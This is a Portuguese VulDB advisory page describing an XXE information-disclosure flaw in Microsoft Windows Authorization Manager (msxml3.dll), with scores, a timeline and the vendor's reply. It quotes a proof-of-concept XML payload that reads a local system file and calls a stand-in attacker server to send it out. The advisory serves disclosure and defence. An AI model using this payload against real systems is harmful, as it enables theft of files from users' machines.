Microsoft Windows Authorization Manager msxml3.dll Ficheiro Divulgação de Informação

CVSS Meta Pontuação TemporáriaPreço atual do exploit (≈)Nota de Interesse CTI
4.8$0-$5k0.00

Sumárioinformação

Uma vulnerabilidade foi encontrada em Microsoft Windows. Foi declarada como problemático. O elemento afetado é uma função não identificada na biblioteca msxml3.dll no componente Authorization Manager. A manipulação com uma entrada desconhecida leva a Divulgação de Informação. O ataque pode ser levado a cabo através da rede. Além disso, um exploit está disponível.

Detalhesinformação

Uma vulnerabilidade foi encontrada em Microsoft Windows. Foi declarada como problemático. O elemento afetado é uma função não identificada na biblioteca msxml3.dll no componente Authorization Manager. A manipulação com uma entrada desconhecida leva a Divulgação de Informação. Usar a CWE para declarar o problema leva à CWE-200. A fraqueza foi publicada 04/12/2016 por John Page (hyp3rlinx) como Microsoft Authorization Manager "azman" XML External Entity como Mailinglist Post (Full-Disclosure). O comunicado foi disponibilizado para download em seclists.org. O vendedor cooperou na coordenação do lançamento público.

O ataque pode ser levado a cabo através da rede. Há detalhes técnicos disponíveis. Esta vulnerabilidade apresenta popularidade inferior à média. Além disso, um exploit está disponível. O exploit foi exposto ao público e pode ser aproveitado. No momento, o preço atual de um exploit pode estar em torno de USD $0-$5k atualmente. O projeto MITRE ATT&CK declara a técnica de ataque como T1592.

É declarado como prova de conceito. O exploit está compartilhado para download em seclists.org. A vulnerabilidade foi tratada como uma exploração não pública de dia zero durante pelo menos 96 dias. Como 0-day, o valor estimado no submundo era aproximadamente $25k-$100k. Segue o código empregado pelo exploit:

<?xml version="1.0"?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://attacker-server:8080/payload.dtd";>
%dtd;]>
<pwn>&send;</pwn>

O parecer contém a seguinte observação:

Vendor Reply: August 30, 2016 does not meet the bar for servicing as someone would have to obtain the XML from an untrusted source or compromised source"

Produtoinformação

Tipo

Fabricante

Nome

Licença

Site

CPE 2.3informação

CPE 2.2informação

CVSSv4informação

VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

CVSSv3informação

VulDB Meta Pontuação Base: 5.3
VulDB Meta Pontuação Temporária: 4.8

VulDB Pontuação Base: 5.3
VulDB Pontuação Temporária: 4.8
VulDB Vetor: 🔍
VulDB Fiabilidade: 🔍

CVSSv2informação

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
VectorComplexidadeAutenticaçãoConfidencialidadeIntegridadeDisponibilidade
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear
DesbloquearDesbloquearDesbloquearDesbloquearDesbloquearDesbloquear

VulDB Pontuação Base: 🔍
VulDB Pontuação Temporária: 🔍
VulDB Fiabilidade: 🔍

Exploraçãoinformação

Nome: File
Classe: Divulgação de Informação / File
CWE: CWE-200 / CWE-284 / CWE-266
CAPEC: 🔍
ATT&CK: 🔍

Físico: Não
Local: Não
Remoto: Sim

Disponibilidade: 🔍
Acesso: Público
Estado: Prova de conceito
Autor: John Page (hyp3rlinx)
Descarregar: 🔍
Tendência de preços: 🔍
Estimativa de preço atual: 🔍

0-DayDesbloquearDesbloquearDesbloquearDesbloquear
HojeDesbloquearDesbloquearDesbloquearDesbloquear

Inteligência de ameaçasinformação

Interesse: 🔍
Atores ativos: 🔍
Grupos APT ativos: 🔍

Contramedidasinformação

Recomendação: nenhuma medida conhecida
Estado: 🔍

Tempo 0-dia: 🔍
Tempo de atraso de exploração: 🔍

Linha do tempoinformação

30/08/2016 🔍
30/08/2016 +0 dias 🔍
04/12/2016 +96 dias 🔍
04/12/2016 +0 dias 🔍
05/12/2016 +1 dias 🔍
24/07/2019 +961 dias 🔍

Fontesinformação

Fabricante: microsoft.com
Produto: microsoft.com

Aconselhamento: Microsoft Authorization Manager "azman" XML External Entity
Pessoa: John Page (hyp3rlinx)
Estado: Não definido
Coordenado: 🔍

GCVE (VulDB): GCVE-100-93963
scip Labs: https://www.scip.ch/en/?labs.20161013
Veja também: 🔍

Entradainformação

Criado: 05/12/2016 21h47
Atualizado: 24/07/2019 17h00
Ajustamentos: 05/12/2016 21h47 (55), 24/07/2019 17h00 (2)
Completo: 🔍
Cache ID: 216::103

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Discussão

Ainda sem comentários. Idiomas: pt + es + en.

Por favor, inicie sessão para comentar.

VoltarVisão GeralPróximo

Want to stay up to date on a daily basis?

Enable the mail alert feature now!